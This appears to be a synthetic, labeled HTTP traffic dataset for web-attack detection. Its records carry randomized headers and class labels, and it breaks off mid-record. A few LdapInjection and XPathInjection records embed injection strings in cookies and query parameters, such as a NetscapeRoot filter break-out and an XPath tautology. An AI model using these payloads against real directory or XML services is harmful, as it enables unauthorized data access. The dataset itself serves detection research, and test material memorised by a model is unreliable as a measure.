GET /v-Cf/im@GnZ.fbX0VZpaBl/eyiBeerhtOewllt/eyX9X00wpX_HfrYW/t4@5MDtN/LTRX6/xe6tmemnuf5unliatieo/bwhe6ut/q@@vCcD2lt@08l/0Gc1wfJ8XVFDlm7Dr/tedsk0fisbu.tiff?hszwifq1etl1eA=5848&75oynuqO=524&ntts=f%27&tnn8ytwsn2lUw=styleR%24T&tmt5irah=esP&ieepow=rsbetweeno&3tC2tris=sV&1zehven=4edtTf%3Ai%29esd&06nti02rp=aMDv_43S5 HTTP/1.1
Host: www.rinfrsue.net
Connection: close
Accept: text/xml
Accept-Charset: iso-8859-2;q=0.0, isiri-3342;q=0.3, euc-cn;q=0.8, iso-8859-15
Accept-Encoding: 
Accept-Language: dnnch-eioA, xeAr-To;q=0.5, tw9g-abe;q=0.3, c-Wsqfesd;q=0.9
Cache-Control: no-store
Client-ip: 86.20.85.20
Cookie: oo=185977496;icstd=pRTqG6uwe;vbscriptupdateI9uaPSnph-0=8157375183;xe8yjrl=ne/ys
Cookie2: $Version="92"
Date: Mon, 19 Oct 09 01:21:52 UTC
ETag: "hUNDTa.53Sb7SEZ."
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sat, 29 Dec 07 01:44:12 UTC
If-Unmodified-Since: Tue, 24 Jul 07 16:07:33 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 20
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: -1684
Referer: /rmseqn/eapa/A8nes.avi
TE: trailers,trailers,deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Ltsoa (7TnwVyy2WV; 75pqJzoiR)
UA-CPU: x86
UA-Disp: 8439,526,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0216x076
Via: HTTP/8.1 www.d5ixr.shtml, 0.8 181.215.49.206:3, 8.1 244.67.114.214:1445
Transfer-Encoding: identity
Upgrade: trns/3.6, set/1.1
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 25627
Start - Id: 7380
class: Valid
PUT /ejrygNs/zzed/ibCf4vWzm_ldp/mNVdow.T3gM/htaccesaZSC6GlI2_p8H/exmad4RTalOwas4/mOfgvqMQdb_p/ooirAceCy/Jinsert-_tCWAZC.jpg? HTTP/1.1
Content-Length: 63
Content-Language: aemae,ed5i
Content-Encoding: compress
Content-Location: /asaht/vLren/aecri30/twrhi.mpg
Content-MD5: YmVlaTUxZm9NYWhhZHFsbA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Apr 08 11:22:34 GMT
Last-Modified: Fri, 04 Dec 09 10:10:04 GMT
Host: www.ygeaf.biz
Connection: sdraw0e
Accept: audio/x-wav
Accept-Charset: x-mac-chinesetrad;q=0.9, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: dythc=0rmNstx
Client-ip: 87.84.123.228
Cookie: zadminR5Blink=290993395;Tke=3954741162;ste3naevi=3mH;eogbi8atel=m0ozUWrLoI;WeNkuivneus5=me;yrTcOl2aaa1qndb=ltAcoee
Cookie2: $Version="012"
Date: Thu, 02 Sep 04 18:27:03 UTC
ETag: W/"h0Ub3tGUQhgHBSBo5X"
Expect: 100-continue
From: coe5re@9jhe.fr
If-Modified-Since: Tue, 23 Oct 07 18:45:16 UTC
If-Unmodified-Since: Mon, 24 Apr 06 17:51:43 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Nov 06 24:03:07 CET
Max-Forwards: 8
MIME-Version: 5.7
Pragma: l=Iyi
Proxy-Authorization: NTLM dGoyc3RobnNpSTdjbUVlYXVoZW1lM3RhbW8wT21vdFJJbjZldnJjMDdEZWdhSW9z
Authorization: hIat hhzbeY=wilnefc
Range: 253426-5
Referer: http://www.seNsEvme.cz/htoiaX5p/qsnoa/glhln/cn18afs.asp
TE: deflate
Trailer: Pragma
User-Agent: tnueh1no/7.3.3.5
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 850x401
Via: 4.8 www.lap6trQu.jpg
Transfer-Encoding: compress
Upgrade: pst/9.7, oub/7.2
Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 114.0.180.179
X-Serial-Number: 923074126811
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

poi1xx=nydre&s3nsGfEst6=145&9VSb=e5sautoexeclt8s&tEozytnlm=7749

End - Id: 7380
Start - Id: 20210
class: Valid
GET /s-d5viDSsKdXfY/lgtwl0gwdagjieaekrs/bin371MOSvL3/ottesua3/raheqnl/Ze/b6nmeInb/dN@.swf?lFpawptnms=85277367 HTTP/1.0
Host: www.Sinh9t.com:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rts6iEtu-ptu, zafnc-0c, cIaeha-n;q=0.8, yNnlnNt-laAtmbje;q=0.4
Cache-Control: no-transform
Client-ip: 188.152.50.182
Cookie: jo=nsnchase2rGErpsss;oybsesstanii=si ;4evtus=ccE
Cookie2: $Version="390"
Date: Mon, 30 Mar 09 04:15:33 GMT
ETag: "DhMe68WECRdDRYgQ3nDv"
Expect: awrrh3m
From: sNOdola@NEdehceq.uk
If-Modified-Since: Mon, 18 Oct 04 15:57:48 CET
If-Unmodified-Since: Wed, 09 Mar 05 05:29:18 GMT
If-Match: *
If-None-Match: "ALGWA2kFsKMMwmfDL_T"
If-Range: Mon, 13 Jul 09 13:37:00 CET
Max-Forwards: 157
MIME-Version: 6.8
Pragma: nonRsty='rl'
Proxy-Authorization: Digest username="lseoiae3"
Authorization: NTLM b2t0bjM2bUcwbXM1dDEwZW9rbzJpbWF0dENzYXQzaWF6
Range: 365749-,607-065
Referer: /tcdl0s5/EeijmeeS.css
TE: trailers,deflate;q=0.3,trailers
Trailer: Trailer
User-Agent: eqITpKJO http://www.tmtura.fr
UA-CPU: 68000
UA-Disp: 7522,1953,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4940x047
Via: 4.6 243.64.7.193
Transfer-Encoding: gzip
Upgrade: 95h/9.7, Stlpto/4.2, r3o/5.5, rcn/6.8, earzq/4.0
Warning: 396 www.etsot.png "nrlge3atrzigrleagne" "Tue, 20 Nov 07 19:17:59 GMT"
X-Forwarded-For: 43.1.107.121
X-Serial-Number: 554046996797250
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20210
Start - Id: 12389
class: Valid
GET /wM-euqaMnsM5mcSWXda/P0tXC8JP0D/xtETY2WLaccess_logRUPBq/uUdr_OBvubJP9Ox.shtml?BSAFimgZ=48799103&TtulhpoMe=erg&nepge=arrnr HTTP/1.1
Host: 120.214.252.45
Connection: l0aT
Accept: */*
Accept-Charset: windows-874, x-mac-hebrew, euc-tw;q=0.4, iso-8859-8;q=0.9, iso-8859-3
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 151.154.211.216
Cookie: osra2gainsb=3thsnteimn?;esreAargswblo=P;rr] whusrO dtexecT;43seouwnfarw=rN2T06DEd;1Micaxaobms=u4q0gE_mwzTg
Cookie2: $Version="00"
Date: Mon, 24 Aug 09 03:58:42 GMT
ETag: "zuKbr8_1YImhm.k"
Expect: nRes=wieneyt;tnwsGi=ogaiskdo
From: e4eiiuh@Mdhi8o.com
If-Modified-Since: Mon, 01 Mar 04 08:19:11 CET
If-Unmodified-Since: Wed, 24 May 06 04:29:58 GMT
If-Match: "nrH_Ohe_7rpNDmO0U"
If-None-Match: *
If-Range: Mon, 15 Aug 05 21:51:44 CET
Max-Forwards: 0612
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="oiaj"
Authorization: NTLM T3I0bGduYXBzM2Rzc3RlcGk2ZWRqOWFKdGFoeHRwbm1pM1JtcW9Jc25yZXM=
Range: 430108-5273,-207,-93
Referer: /tAoep/Irgnp8/nenriu/Tra6fi/epeD6g5a.bin
TE: trailers,deflate
Trailer: Connection
User-Agent: skdrZri2/2.6.5
UA-CPU: 68000
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8258x863
Via: haeIg/4.1 www.wh3ap6Td.jpeg, 8.2 www.ymao.js
Transfer-Encoding: gzip
Upgrade: hrA/6.7, e6zNoo/8.6, lilor/5.4, esys/7.1
Warning: 112 www.nlni5Osh.jpg "eEdDh" "Thu, 31 Jan 08 18:55:01 CET"
X-Forwarded-For: 106.171.134.114
X-Serial-Number: 41667021783349598958
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12389
Start - Id: 39096
class: LdapInjection
POST /nAYDUs6C/eo3AJmS/sam1P..jpg? HTTP/1.1
Content-Length: 31
Content-Language: aie,e
Content-Encoding: gzip
Content-Location: /hceedd/prNte/uioa/frnprt/ers7ho.fgf
Content-MD5: ZWVmbm1wZW5sZWFndGV6bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Jan 05 23:48:23 CET
Last-Modified: Mon, 01 Mar 04 21:51:54 UTC
Host: www.nnTrjYa.ch
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 205.150.28.86
Cookie: isrf2Gotp=n6r8bM7AQniF;HmInull2He=dteretnc?group by;jsdgti=")(targetfilter=(o=NetscapeRoot));jDretew2ih4T=%u8isi1ecajh;dkhdcd=wT_flGN;1blse8m==Z oEnTee=openc
Cookie2: $Version="58"
Date: Mon, 25 Apr 05 11:31:03 CET
ETag: W/"WXBhCuxGwgyfjUq4P"
Expect: 100-continue
If-Modified-Since: Tue, 28 Nov 06 24:47:10 GMT
If-Unmodified-Since: Tue, 02 Mar 10 12:25:04 UTC
If-Match: *
If-None-Match: "kSeJqT1ejCDZTdoME1"
If-Range: *
Max-Forwards: 3469
Pragma: no-cache
Authorization: NTLM dHJ1ckhubmFtTmJldGVrblNlYTFlYW1hcm9la3hubmVveWkyc2U=
Range: 85-5,851-,8-17
Referer: http://www.sdenH.be/hE48Nuc/rnhv.php
TE: deflate;q=0.3
Trailer: Accept
User-Agent: Mhhn (ttulhBFB-; p3RaIdtWL; 0L9NQa)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 9598x0581
Via: 8.8 21.58.37.163
Transfer-Encoding: deflate
Upgrade: 7eeKe/5.6, Suar/6.3
Warning: 412 www.rdng.jpeg "rl9sz" "Tue, 12 May 09 01:48:31 GMT"
X-Forwarded-For: 160.192.213.166
X-Serial-Number: 3517637301815
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~

nh=94&nEgnrnbt3e5=miae&UC962O=6

End - Id: 39096
Start - Id: 28475
class: Valid
GET /enegulf0rsnrjr/iyzrdcb3Iri7/hsaLec02ewea/eEYHCglfo@ys/9Kl5bcwMFW-zpFP9gfw/uocdemnetcuk/haesit1r0eGhuhto/tJhYPhsOhEO/i9/q6q6l0sSxtKDs369t3QW/in/a-7wzQ.htm? HTTP/1.1
Host: 78.186.143.111
Connection: keep-alive
Accept: image/*, image/png;q=0.4, text/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=8966
Client-ip: 160.213.172.45
Cookie: zsho9tsiTaf=53437;djdgd34eeSEame=utinnyrmhr;fhts3stedo=(dropri:
Cookie2: $Version="5"
Date: Fri, 12 Jan 07 15:53:10 GMT
ETag: W/"4oMQV_ux-KoTLYo16"
Expect: 100-continue
From: zneku@9etnnTes8.it
If-Modified-Since: Sat, 31 Dec 05 16:02:04 CET
If-Unmodified-Since: Tue, 03 Mar 09 16:01:09 CET
If-Match: "qiRYjB1M535LhuB"
If-None-Match: "R8dtEqeVgsDFay0rZi"
If-Range: Tue, 12 Feb 08 20:29:26 GMT
Max-Forwards: 1
MIME-Version: 1.7
Pragma: 67intl2=moi2e
Proxy-Authorization: oterIs cdpe=ll2ore
Authorization: NTLM ZWVzNmh0bjlYb2FldGhydW5oajNvaTV0ODZvaG82b2tjaXpvYW9v
Range: 51205-,399-
Referer: http://reEEzrr.uk/LctomIwp/vieqameo.jpeg
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 1.1; se-ne; rv:0.2.3) Gecko/22263163
UA-CPU: x86
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 686x883
Via: 8.3 www.tohaspan.png:80136
Transfer-Encoding: identity
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 489 121.229.92.62 "gfasavwbhatyeEell" "Tue, 13 Apr 04 09:59:47 UTC"
X-Forwarded-For: 243.229.193.59
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28475
Start - Id: 12728
class: Valid
GET /s6VVikCl5M1WPaChn/1h/oHVzoiQNrFOY.asp?mduScromeutn=8817785938&eatjiftsahsm=71288 HTTP/1.0
Host: 147.8.153.78:30967
Connection: keep-alive
Accept: application/*;q=0.4, video/mpeg;q=0.7, audio/x-wav;q=0.3
Accept-Charset: windows-1250
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 93.60.208.57
Cookie: eXhhavingRAMwboot.inicpasswd=nfx;laeiPowgreSawa=EeTurg7waf7fhtef;39wnedioret=Or@unfWiddxi a;ea16gaENbn=2;JeStcc7E=40
Cookie2: $Version="4"
Date: Thu, 15 Sep 05 15:24:33 UTC
ETag: W/"VuiaQ17yksuYpCP"
Expect: 100-continue
From: Stwoo@9oieten.net
If-Modified-Since: Mon, 25 Oct 04 12:45:09 CET
If-Unmodified-Since: Wed, 19 Dec 07 16:46:23 CET
If-Match: "7eos_RBv-OvEtuCnw1"
If-None-Match: "XwgcNnfvJgK1aQXqO"
If-Range: *
Max-Forwards: 848
MIME-Version: 4.0
Pragma: sd=tae
Proxy-Authorization: stgyt iacOt=tu9k
Authorization: Digest uri=/hEfge/dort/ehpc/mjrmLle.bin
Range: 187455-,-6511
Referer: /rulllocu.msf
TE: trailers,trailers,chunked;q=0.8
Trailer: Upgrade
User-Agent: iFalivIvI http://www.jc0Sedc.cz
UA-CPU: MIPS
UA-Disp: 608,854,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 780x3609
Via: FTP/1.6 www.npjew.tiff, FTP/6.4 32.184.82.139, 4.4 87.17.164.109
Transfer-Encoding: compress
Upgrade: efcs/9.9
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 91220427481224
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12728
Start - Id: 13969
class: Valid
GET /1PD26t73@FF/t0D6CP0nfXPc7WGop4c/srr1ymwesr/ttomamjcbhebC/ymeibrlioe/t3sIzL@KmZ.yu.css? HTTP/1.1
Host: www.bpae.ch
Connection: ewEHqih
Accept: video/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.6, deflate, compress;q=0.2
Accept-Language: *;q=0.2
Cache-Control: max-stale=74
Client-ip: 16.127.223.115
Cookie: fT64czfG=fe tbbetweennfr;deoJ2OPvatcGt8e=8790031;etet=esX8t3X;dslmeamBssifb=xiiohfcrmelg3tg;n3ergno=jyn
Cookie2: $Version="32"
Date: Tue, 30 Mar 10 16:58:26 CET
ETag: W/"8JXFlRSCoI-nI9R6pUv"
Expect: 100-continue
From: sTsgewns@snfh4s.it
If-Modified-Since: Fri, 18 Jan 08 21:50:14 GMT
If-Unmodified-Since: Mon, 01 Feb 10 02:02:08 GMT
If-Match: "rN2TU_ejQ_xXJI.OyQ-Q"
If-None-Match: *
If-Range: Mon, 18 Jan 10 06:30:45 UTC
Max-Forwards: 60
MIME-Version: 2.2
Pragma: de0gnmup='nlrtiw9'
Proxy-Authorization: Basic dHJ1Rm1hYTphaWxvTHU=
Authorization: Noduia mrs0eetO=eornswt
Range: -938,-124
Referer: http://iuzr.fr/rgwRS/Bbenha7/tcLt.swf
TE: deflate;q=0.5,trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.6 (Windows; U; Windows NT 2.8; bk-cr; rv:9.7.7) Gecko/40713557
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: 7.4 www.iiqenF3S.css:9776
Transfer-Encoding: gzip
Upgrade: Neetri/9.3, lpnc/7.7, rmz/2.4, leg/5.0, eno/0.0
Warning: 685 9.233.204.186 "lsCzatletu88ss4dot" "Sat, 15 Oct 05 21:02:02 UTC"
X-Forwarded-For: 231.230.155.168
X-Serial-Number: 738264285065396
----: ------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13969
Start - Id: 28774
class: Valid
GET /aGjpynJBoYYW@1Sz.Puq/fcnztrblt/Szo/7rajut1adomuqitu/eirtFnustg2ditz/egS6dGahEr/tBOjh/bZ5z.jpg?1l0abndos=9wCgSIUz&sslqrlT=ed&X0l=odn&ahnt5aisrql=3594277&nsotlz=%3Fiaeibo&hr5jregrtci6h=ge&o0Coftbsvgmn=n0antmy4tTIemyvfmr HTTP/1.0
Host: www.thgla.ch:80
Connection: detlntz
Accept: image/png;q=0.7, application/*;q=0.4, audio/x-wav;q=0.4
Accept-Charset: *
Accept-Encoding: identity, identity, compress;q=0.5, gzip;q=0.6, identity
Accept-Language: *;q=0.0
Cache-Control: max-age=308
Client-ip: 218.215.31.98
Cookie: ninc=DfBl;i9hiDrj=37489033;roe245aohiehf=aysehhtacceshtacces staldwide:te
Cookie2: $Version="70"
Date: Thu, 08 Apr 04 22:16:18 UTC
ETag: "rHk7h3zz@PuTHBWKwI"
Expect: 100-continue
From: yrrE0@eR1rsh.ch
If-Modified-Since: Sat, 16 Oct 04 07:48:28 GMT
If-Unmodified-Since: Wed, 22 Oct 08 14:53:57 UTC
If-Match: "rbXg8@@UEcHlZXYijROZ"
If-None-Match: *
If-Range: "456-AY3.m@lISdPZON"
Max-Forwards: 2
MIME-Version: 4.4
Pragma: o=9eWt2eTi
Proxy-Authorization: NTLM amM2ZnVhaHVldDJ0b1hzZUEyY2FqT3JzZW9udHlib3RkczA5
Authorization: apixh7 letbs3nf=Paqmro1
Range: -20
Referer: http://www.lete.com/s3umfao/elss/tl06.asmx
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: dCcRER http://www.uotaup.de
UA-CPU: x86
UA-Disp: 6540,3591,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5260x374
Via: 1.7 www.nlho.png
Transfer-Encoding: identity
Upgrade: lwsi/8.0, kwn0/1.2
Warning: 263 www.orehreth.jpg "pIt9" "Wed, 11 Jul 07 24:19:28 CET"
X-Forwarded-For: 1.11.0.97
X-Serial-Number: 6146451929340864591
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28774
Start - Id: 49530
class: XPathInjection
GET /dN7bj/uumtd2eys/fLMNeWKpKjED3PtzSrc.jpg?emDde=1arcX&omt1r=3441&60kebrdnrr=e&kIaazio4nNoO9fS=hm8&cwosA=ltFiC%27+or+++++1%3C+++cv2%2Fs%2Feawn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D256%5D++++or++++%27in%27+%3D%27 HTTP/1.0
Host: www.aeaeesvjo.de
Connection: close
Accept: audio/x-wav, text/*;q=0.2, image/*
Accept-Charset: x-mac-icelandic;q=0.8, iso-10646-ucs-2, euc-cn, shift_jis
Accept-Encoding: gzip, gzip;q=0.8
Accept-Language: *
Cache-Control: max-age=69231
Client-ip: 91.134.19.242
Cookie: knsjpe=oservicesl7Nt%ap aSaN;cD5l=85737;craowfa=76422;Wsettkseaeqot=kyaupdatey1 rcgroup bya hreplace&mete;wrensEpo=86559374;Cmbq9R4processing-instructionvv=27
Cookie2: $Version="18"
Date: Thu, 21 Feb 08 02:38:49 UTC
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: jwtneu@uosy.be
If-Modified-Since: Sun, 12 Apr 09 20:51:59 UTC
If-Unmodified-Since: Thu, 03 Mar 05 08:38:21 GMT
If-Match: "itWx1sIPDtP89K0VoC6"
If-None-Match: "esd-cwe_HOo0n30EGLR"
If-Range: *
Max-Forwards: 545
MIME-Version: 4.3
Pragma: oNs3r7i=ad1engl
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: NTLM c2RlbGl0Y1NObHJ0bmljZVVhdG5nbmxpaE5zZHNUbW9naTVlb25ubg==
Range: 515-482
Referer: /Onxrrryp.mdb
TE: deflate;q=0.5
Trailer: Connection
User-Agent: Mozilla/5.0 (Machintosh; U; PPC 1.6; ii-pl; rv:1.2.9) Gecko/77121228
UA-CPU: x86
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 661x844
Via: HTTP/3.0 www.eMww.jpeg:8908
Transfer-Encoding: gzip
Upgrade: 2ao/4.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 1653383151363869
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49530
Start - Id: 38139
class: LdapInjection
GET /mpTq_js.J.e6usq/neeOpr/8j9zy.IhttpsuvHW/LPiitris/gM.png?Ro=10&oohe1=14780523&heoxLeaevfha=tbin&ECtF=hg&zbe=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Llrsor2s5=9&aelja=systeml2a0u0jh5b&mOrdReoonv3=vINago HTTP/1.0
Host: www.lhg87.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: e-qhde, geHErrpe-5;q=0.7, esHwliey-m;q=0.2
Cache-Control: no-store
Client-ip: 208.27.219.39
Cookie: iabaaag=aaew;2le=9500322088;.b90z1jA=6l7passwdeb;5ttanfeEhtaet87=66440;Goza=2
Cookie2: $Version="23"
Date: Wed, 27 Oct 04 01:00:00 GMT
ETag: W/"98fpe.RdDv1e0Ihe"
Expect: 100-continue
From: yoralt7@issci.gov
If-Modified-Since: Mon, 03 May 10 15:11:59 UTC
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "qF71BkNVQyI.4Ygg"
If-None-Match: *
If-Range: Thu, 09 Aug 07 16:07:18 CET
Max-Forwards: 576
MIME-Version: 1.0
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic U2xUVGloRWk6Ym5jd2R5
Range: -49,90-,6-
Referer: http://2t0m.st/eta6iA/2ocko9Th/0ttog/all5o/ctitne.nsf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 4.6; ga-ie; rv:7.6.0) Gecko/81077501
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2471x139
Via: 1.0 www.atrTnaei.jpeg, 0.6 170.98.221.232, 4.7 62.173.119.58
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38139
Start - Id: 4233
class: Valid
POST /zYxmU2xQ/1IqHVbzuQNYko/etOu8rernhwliin5t/qJyegQE/rLlSdse/nAzudgeb7agixh5/t2ea7an/alencifmhiinhsc/kHRcpqys/srNiix8eirhrct/sdcootri9lders.css? HTTP/1.0
Content-Length: 189
Content-Language: 2ont0O
Content-Encoding: identity
Content-Location: http://www.ocnmo7u.st/eloxvAm/LdAn/twne7lat/hnsftm.ace
Content-MD5: NGlhemRPYWVhYXBkczBvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Mar 07 23:14:12 GMT
Last-Modified: Sat, 20 Oct 07 17:32:48 UTC
Host: 68.164.222.66
Connection: close
Accept: audio/*;q=0.6
Accept-Charset: utf-7;q=0.0
Accept-Encoding: gzip, identity, identity
Accept-Language: aorE4ho-ro;q=0.2, ettEn-s, h-r;q=0.1, 3ehoAbq-tr
Cache-Control: min-fresh=9
Client-ip: 155.67.113.243
Cookie: ciil8w3haet=w-PHYld;ie8eechetci=ngw;htrya6wa=Cnozn;tEWt=ts
Cookie2: $Version="571"
Date: Mon, 03 Aug 09 13:23:40 UTC
ETag: "dAzQsYVf9kp3HLIs52i"
Expect: 100-continue
From: cheNzi@niYa.de
If-Modified-Since: Tue, 26 Oct 04 03:17:03 GMT
If-Unmodified-Since: Thu, 17 May 07 12:06:42 GMT
If-Match: *
If-None-Match: "OXrSgpbLC79cEVY_-"
If-Range: Wed, 23 Aug 06 11:17:58 CET
Max-Forwards: 2612
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: ini5 andat=olio
Authorization: TsEnht 7tasa=riaE
Range: 936255-,7-,-5
Referer: /EkArn9r.php
TE: trailers
Trailer: Host
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 8.7; ef-ni; rv:7.4.6) Gecko/17878136
UA-CPU: x86
UA-Disp: 9117,635,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4623x593
Via: 7.8 249.124.238.150, HTTP/8.1 216.8.140.66
Transfer-Encoding: deflate
Upgrade: 5ck/7.3
Warning: 344 www.s3tCkSq.css "tonieta9" "Mon, 02 Feb 09 17:14:30 UTC"
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 3720829433622
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

execax7i=801&oah0uiawbe1g=u&hhaanrA=rBq7SWGIdyck&R6dkservicesusrwXg==oriedalocb&haraeahr=nrlmfattx&io6eaayl7cnfiho=dnnga&uidFDnnwr0s9=5h&u6oavbitRe=76709058&oNtuSaepg3w=pyci2dhhneqalteovO

End - Id: 4233
Start - Id: 16717
class: Valid
GET /oloNe/hnpsd/rfreslt3hs3tlcs/Del9.havinghbaccess_logB/Yt/gicfeecn6qod6IIlh/oS/rE/62gmB0j.ptD.css?miptio7a=tcNntLactvorhsisj&8mQ4S=49&haewxheaaja=%24+&mp6i7tr50iu=19964&oienosz=aEfnsrNAoUEIe&3Doahrue=iIas HTTP/1.1
Host: www.ofwrawmx.be:80
Connection: ia8ialo
Accept: text/plain
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: ee1a-a2P7xt;q=0.3, 6R1oo-tuoi, os-a9weeZl
Cache-Control: max-stale
Client-ip: 25.236.249.109
Cookie: goxYSt4=h;aen8nkM=UiOi;cdasrudejrocrCm=27855;to=s;QoptXT=gkUUm8;abrge=73909
Cookie2: $Version="51"
Date: Sat, 22 Jul 06 11:06:19 CET
ETag: "lU3lW.mlpvrUFxzvnDj"
Expect: 100-continue
From: o6botttt@Meerth.org
If-Modified-Since: Tue, 13 Mar 07 05:35:24 CET
If-Unmodified-Since: Sun, 05 Apr 09 05:51:40 UTC
If-Match: *
If-None-Match: "2Qgm7UdfMcFr18r.lq3y"
If-Range: "Spn0SnVTZnxxdfVMG"
Max-Forwards: 2
MIME-Version: 4.6
Pragma: a=dsrmgw
Proxy-Authorization: NTLM Y29kbXc0dXlob3VlZmVzcmQwZWFzdWhsaFJubm5oM2I1VGU=
Authorization: Digest nc=82E0feed
Range: 735-128151,-280736
Referer: http://www.tepBRd.gov/deli/mtmin.php
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Yoir/5.7
UA-CPU: x86
UA-Disp: 3273,598,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2648x5027
Via: FTP/0.9 133.9.243.137, 8.3 143.248.53.87, FTP/0.3 www.neStace2.htm:036
Transfer-Encoding: deflate
Upgrade: wsgnwl/0.0, 7nltw/5.0, 7ai/7.4, rhRh/3.3, eMvtpm/2.1
Warning: 635 111.175.4.37 "odotyu1nei7D" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 6672124414
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16717
Start - Id: 21118
class: Valid
GET /h.25Eupdate/tLX3jXq0qP/ia/omr3two2omEadau/ei7scq/my9Pq4rT8RD/iLd6aRLb_jzH/qp2Bslrrhdnqdaesc5.bin?oxts6rbkefah=lib&vxJo4A22mAxbin=129&bo8=40588&cbiyv5wexnt=3&sdHykfyolTer=ma&dE3tdahijciEsc=0soo%25dbRtt%3Fd&D.hsm_M=3&BntoTmoe=az&elaitttml=6&dhlet1w48=al95woea&W7yanOtda0sft=nafr&atweitoTltepti3=rxUL&log8hQHfromidQUr=laatiRaAecm&cmdfke8feedih=omzqelrwbe0lfY47&idshofprt=0972 HTTP/1.0
Host: www.dhcdmi6s.net
Connection: 1tVINdir
Accept: audio/basic, text/html;q=0.8, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ta-dorcli;q=0.2, cszbr-8, g-lggksaT;q=0.8, otrE-rsere, n1-tng8auel
Cache-Control: only-if-cached
Client-ip: 229.226.31.164
